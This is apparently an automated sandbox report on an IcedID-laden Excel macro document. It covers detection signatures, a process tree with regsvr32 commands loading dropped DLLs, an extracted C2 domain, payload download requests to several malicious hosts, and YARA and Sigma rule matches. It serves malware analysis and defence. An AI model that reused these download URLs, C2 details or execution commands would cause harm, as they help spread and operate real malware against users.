
Windows Analysis Report Vac.list07-20214862208.xlsm

Overview

General Information

Sample Name: Vac.list07-20214862208.xlsm
Analysis ID: 444731
MD5: 49dda1569fdceeb75d6bf6b3cd293e75
SHA1: 8f77afedef8985e2c48a70d6ae082afc3a48c55f
SHA256: ded09606ba0d53a60f51abcb8254decc7cb49e8a4e26ad8e97f6ee49a7dd12ef
Tags: IcedID, xlsm

Detection

IcedID
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Document exploit detected (creates forbidden files)
Document exploit detected (drops PE files)
Found malware configuration
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected IcedID
C2 URLs / IPs found in malware configuration
Contains functionality to detect hardware virtualization (CPUID execution measurement)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Drops PE files to the user root directory
Office process drops PE file
Sigma detected: Microsoft Office Product Spawning Windows Shell
Tries to detect virtualization through RDTSC time measurements
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to call native functions
Contains functionality to query network adapter information
Detected potential crypto function
Downloads executable code via HTTP
Dropped file seen in connection with other malware
Drops PE files
Drops PE files to the user directory
Drops files with a non-matching file extension (content does not match file extension)
Excel document contains an embedded macro which executes code when the document is opened
Found dropped PE file which has not been started or loaded
HTTP GET or POST without a user agent
IP address seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
PE file contains an invalid checksum
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Registers a DLL
Uses a known web browser user agent for HTTP communication
Uses insecure TLS / SSL version for HTTPS connection
Yara signature match

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 2644 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 2416 cmdline: regsvr32 -silent ..\XRAY.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2908 cmdline: regsvr32 -silent ..\XTOWN.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 2852 cmdline: regsvr32 -silent ..\XZIBIT.dll MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

Threatname: IcedID

{"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}

Yara Overview

PCAP (Network Traffic)

Source: dump.pcap
Rule: JoeSecurity_IcedID_1
Description: Yara detected IcedID
Author: Joe Security

Memory Dumps

Source: 00000004.00000002.2088452556.0000000000190000.00000004.00000001.sdmp
Rule: MAL_IcedID_GZIP_LDR_202104
Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads
Author: Thomas Barabosch, Telekom Security
Strings:
  • 0x27c6:$internal_name: loader_dll_64.dll
  • 0x30b4:$string0: _gat=
  • 0x3114:$string1: _ga=
  • 0x30ec:$string2: _gid=
  • 0x30cc:$string3: _u=
  • 0x3026:$string4: _io=
  • 0x30d8:$string5: GetAdaptersInfo
  • 0x2b16:$string6: WINHTTP.dll
  • 0x27ea:$string7: DllRegisterServer
  • 0x27fc:$string8: PluginInit
  • 0x3080:$string9: POST
  • 0x3140:$string10: aws.amazon.com

Source: 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmp
Rule: JoeSecurity_IcedID_1
Description: Yara detected IcedID
Author: Joe Security

Source: Process Memory Space: regsvr32.exe PID: 2908
Rule: JoeSecurity_IcedID_1
Description: Yara detected IcedID
Author: Joe Security

Unpacked PEs

Source: 4.2.regsvr32.exe.3c0000.1.unpack
Rule: MAL_IcedID_GZIP_LDR_202104
Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads
Author: Thomas Barabosch, Telekom Security
Strings:
  • 0x27c6:$internal_name: loader_dll_64.dll
  • 0x30bc:$string0: _gat=
  • 0x311c:$string1: _ga=
  • 0x30f4:$string2: _gid=
  • 0x30d4:$string3: _u=
  • 0x302e:$string4: _io=
  • 0x30e0:$string5: GetAdaptersInfo
  • 0x2b16:$string6: WINHTTP.dll
  • 0x27ea:$string7: DllRegisterServer
  • 0x27fc:$string8: PluginInit
  • 0x3088:$string9: POST
  • 0x3148:$string10: aws.amazon.com

Source: 4.2.regsvr32.exe.190000.0.unpack
Rule: MAL_IcedID_GZIP_LDR_202104
Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads
Author: Thomas Barabosch, Telekom Security
Strings:
  • 0x1bc6:$internal_name: loader_dll_64.dll
  • 0x1f16:$string6: WINHTTP.dll
  • 0x1bea:$string7: DllRegisterServer
  • 0x1bfc:$string8: PluginInit

Source: 4.2.regsvr32.exe.190000.0.raw.unpack
Rule: MAL_IcedID_GZIP_LDR_202104
Description: 2021 initial Bokbot / Icedid loader for fake GZIP payloads
Author: Thomas Barabosch, Telekom Security
Strings:
  • 0x27c6:$internal_name: loader_dll_64.dll
  • 0x30b4:$string0: _gat=
  • 0x3114:$string1: _ga=
  • 0x30ec:$string2: _gid=
  • 0x30cc:$string3: _u=
  • 0x3026:$string4: _io=
  • 0x30d8:$string5: GetAdaptersInfo
  • 0x2b16:$string6: WINHTTP.dll
  • 0x27ea:$string7: DllRegisterServer
  • 0x27fc:$string8: PluginInit
  • 0x3080:$string9: POST
  • 0x3140:$string10: aws.amazon.com

Sigma Overview

System Summary:

Sigma detected: Microsoft Office Product Spawning Windows Shell
Source: Process started
Author: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team
Data: Command: regsvr32 -silent ..\XRAY.dll, CommandLine: regsvr32 -silent ..\XRAY.dll, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2644, ProcessCommandLine: regsvr32 -silent ..\XRAY.dll, ProcessId: 2416

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 4.2.regsvr32.exe.3c0000.1.unpack, Malware Configuration Extractor: IcedID {"Campaign ID": 3565085024, "C2 url": "astrocycle.download"}
Yara detected IcedID
Source: Yara match, File source: dump.pcap, type: PCAP
Source: Yara match, File source: 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmp, type: MEMORY
Source: Yara match, File source: Process Memory Space: regsvr32.exe PID: 2908, type: MEMORY
Source: unknown, HTTPS traffic detected: 143.204.91.74:443 -> 192.168.2.22:49168 version: TLS 1.0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

Document exploit detected (creates forbidden files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\XTOWN.dll
Document exploit detected (drops PE files)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: lsdfik[1].fml.0.dr
Document exploit detected (UrlDownloadToFile)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Section loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, Process created: C:\Windows\System32\regsvr32.exe
Source: global traffic, DNS query: name: thousandsyears.download
Source: global traffic, TCP traffic: 192.168.2.22:49168 -> 143.204.91.74:443
Source: global traffic, TCP traffic: 192.168.2.22:49165 -> 172.67.198.51:80

Networking:

C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor, URLs: astrocycle.download
Source: global traffic, HTTP traffic detected:
  HTTP/1.1 200 OK
  Date: Tue, 06 Jul 2021 14:03:20 GMT
  Content-Type: application/octet-stream
  Content-Length: 57856
  Connection: keep-alive
  Content-Disposition: attachment; filename=lsdfik.fml
  Cache-Control: max-age=14400
  CF-Cache-Status: HIT
  Age: 408
  Accept-Ranges: bytes
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=ok0%2BKH3qYq2KE6v3gQLN3TWTjlXs%2FKCRGpa%2FlFhmTNEoEITtRmc8v%2F0WKD6n6Q3yMMghYJeW2oB30YxmpG2A3fj2joIQxvcX8ud1RSYOYd%2BwmI%2BaTcYISYPeXQ%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 66a9603d29d64e2b-FRA
  alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
  Data Ascii: MZ@!L!This program cannot be run in DOS mode.$MMM>NMKMILLRichMPEd`" : `(P@
Source: global traffic, HTTP traffic detected:
  GET / HTTP/1.1
  Connection: Keep-Alive
  Cookie: __gads=3565085024:1:8053:46; _gat=6.1.7601.64; _ga=1.329303.0.5; _u=353036303133:416C627573:30363131453532434638444631434333; __io=0; _gid=67AFEDC5AC03
  Host: astrocycle.download
Source: Joe Sandbox View, IP Address: 172.67.198.51
Source: Joe Sandbox View, IP Address: 143.204.91.74
Source: Joe Sandbox View, IP Address: 104.21.37.209
Source: Joe Sandbox View, JA3 fingerprint: 05af1f5ca1b87cc9cc9b25185115607d
Source: global traffic, HTTP traffic detected:
  GET /div/44376,8555986111.jpg HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: thousandsyears.download
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET /div/44376,8555986111.jpg HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: voopeople.fun
  Connection: Keep-Alive
Source: global traffic, HTTP traffic detected:
  GET /div/44376,8555986111.jpg HTTP/1.1
  Accept: */*
  UA-CPU: AMD64
  Accept-Encoding: gzip, deflate
  User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
  Host: uppercilio.fun
  Connection: Keep-Alive
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\55CFCD6F.png
Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmp, String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-none-v-margin lb-txt" style="padding-right:5px;" href="https://www.facebook.com/amazonwebservices" target="_blank" rel="noopener" title="Facebook"> <i class="icon-facebook"></i></a> equals www.facebook.com (Facebook)
Source: regsvr32.exe, 00000004.00000003.2085674119.000000000294B000.00000004.00000001.sdmp, String found in binary or memory: <a class="lb-txt-none lb-txt-p-chromium lb-none-pad lb-txt" style="padding-right:5px;" href="https://www.youtube.com/user/AmazonWebServices/Cloud/" target="_blank" rel="noopener" title="YouTube"> <i class="icon-youtube"></i></a> equals www.youtube.com (Youtube)
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: Content-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com 
https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservice
Source: regsvr32.exe, 00000004.00000002.2091204601.00000000030B0000.00000002.00000001.sdmp, String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: X-Amz-Cf-Idz5h_yHz14Itn1k8Sx6CKvYZbnNxlkFvpEWQBqIphWoboBCUUTE-gug==X-Amz-Cf-PopFRA50-C1X-CacheMiss from cloudfrontPermissions-Policyinterest-cohort=()Content-Security-Policy-Report-Onlydefault-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com 
https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.c
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com https://dpm.demdex.net 
https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.com https://mktg-apac.s3-ap-southea
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: ntent-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com 
https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: ntent-Security-Policy-Report-Only: default-src 'self' data: https://a0.awsstatic.com; connect-src 'self' https://112-tzm-766.mktoresp.com https://112-tzm-766.mktoutil.com https://a0.awsstatic.com https://a0.p.awsstatic.com https://a1.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://amazonwebservicesinc.tt.omtrdc.net https://api.regional-table.region-services.aws.a2z.com https://api.us-west-2.prod.pricing.aws.a2z.com https://b0.p.awsstatic.com https://c0.b0.p.awsstatic.com https://calculator.aws https://d0.awsstatic.com https://d1.awsstatic.com https://d1fgizr415o1r6.cloudfront.net https://d3borx6sfvnesb.cloudfront.net https://dc.ads.linkedin.com https://dftu77xade0tc.cloudfront.net https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://i18n-string.us-west-2.prod.pricing.aws.a2z.com https://prod.log.shortbread.aws.dev https://prod.tools.shortbread.aws.dev https://s0.awsstatic.com https://s3.amazonaws.com/aws-messaging-pricing-information/ https://s3.amazonaws.com/public-pricing-agc/ https://spot-bid-advisor.s3.amazonaws.com https://view-stage.us-west-2.prod.pricing.aws.a2z.com https://view-staging.us-east-1.prod.plc1-prod.pricing.aws.a2z.com https://www.youtube-nocookie.com; font-src 'self' data: https://a0.awsstatic.com https://f0.awsstatic.com https://fonts.gstatic.com; frame-src 'self' https://c0.b0.p.awsstatic.com https://calculator.aws https://dpm.demdex.net https://www.youtube-nocookie.com; img-src 'self' data: https://*.ads.linkedin.com https://*.vidyard.com https://*.ytimg.com https://a0.awsstatic.com https://amazonwebservices.d2.sc.omtrdc.net https://aws-quickstart.s3.amazonaws.com https://awsmedia.s3.amazonaws.com https://d1.awsstatic-china.com https://d1.awsstatic.com https://d2908q01vomqb2.cloudfront.net https://d36cz9buwru1tt.cloudfront.net https://docs.aws.amazon.com 
https://dpm.demdex.net https://fls-na.amazon.com https://googleads.g.doubleclick.net https://img.youtube.com https://marketingplatform.google.com https://media.amazonwebservices.com https://p.adsymptotic.com https://pages.awscloud.com https://s3.amazonaws.com/aws-quickstart/ https://ssl-static.libsyn.com https://static-cdn.jtvnw.net https://www.google.com https://www.linkedin.com https://yt3.ggpht.com; media-src 'self' https://*.libsyn.com https://a0.awsstatic.com https://anchor.fm https://awsmedia.s3.amazonaws.com https://awspodcastsiberiaent.s3.eu-west-3.amazonaws.com https://chtbl.com https://d1.awsstatic.com https://d1hemuljm71t2j.cloudfront.net https://d1le29qyzha1u4.cloudfront.net https://d1oqpvwii7b6rh.cloudfront.net https://d1vo51ubqkiilx.cloudfront.net https://d1yyh5dhdgifnx.cloudfront.net https://d2908q01vomqb2.cloudfront.net https://d2a6igt6jhaluh.cloudfront.net https://d3ctxlq1ktw2nl.cloudfront.net https://d3h2ozso0dirfl.cloudfront.net https://dgen8gghn3u86.cloudfront.net https://dk261l6wntthl.cloudfront.net https://download.stormacq.com/aws/podcast/ https://dts.podtrac.com https://media.amazonwebservices.
        Source: regsvr32.exe, 00000004.00000002.2088529033.000000000024D000.00000004.00000020.sdmp String found in binary or memory: www.login.yahoo.com0 equals www.yahoo.com (Yahoo)
        Source: unknown DNS traffic detected: queries for: thousandsyears.download
        Source: global traffic HTTP traffic detected:
            HTTP/1.1 404 Not Found
            Date: Tue, 06 Jul 2021 14:03:24 GMT
            Content-Type: text/html; charset=UTF-8
            Transfer-Encoding: chunked
            Connection: keep-alive
            CF-Cache-Status: DYNAMIC
            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v2?s=c9m9rUyBRXM1jwbZnQnjrdkcxrPLNKC33w7AQ0XAQre54ieS8G0YxkLLsb6qhBGQAR8g40dUX3LfP44TOwFsAmBmZl7LDWuENpEDOUNNRrD%2Fc6PWZud4EH25iI48xq4vIg%3D%3D"}],"group":"cf-nel","max_age":604800}
            NEL: {"report_to":"cf-nel","max_age":604800}
            Server: cloudflare
            CF-RAY: 66a960506f5bc2f4-FRA
            alt-svc: h3-27=":443"; ma=86400, h3-28=":443"; ma=86400, h3-29=":443"; ma=86400, h3=":443"; ma=86400
            Data Ascii: 111<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><hr><address>Apache Server at astrocycle.download Port 80</address></body></html>
        Source: regsvr32.exe, 00000004.00000002.2088517026.000000000023E000.00000004.00000020.sdmp String found in binary or memory: http://astrocycle.download/
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d1yyh5dhdgifnx.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d2908q01vomqb2.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d2a6igt6jhaluh.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d36cz9buwru1tt.cloudfront.net
        Source: regsvr32.exe, 00000004.00000003.2085630063.000000000293C000.00000004.00000001.sdmpString found in binary or memory: https://d3borx6sfvnesb.cloudfront.net
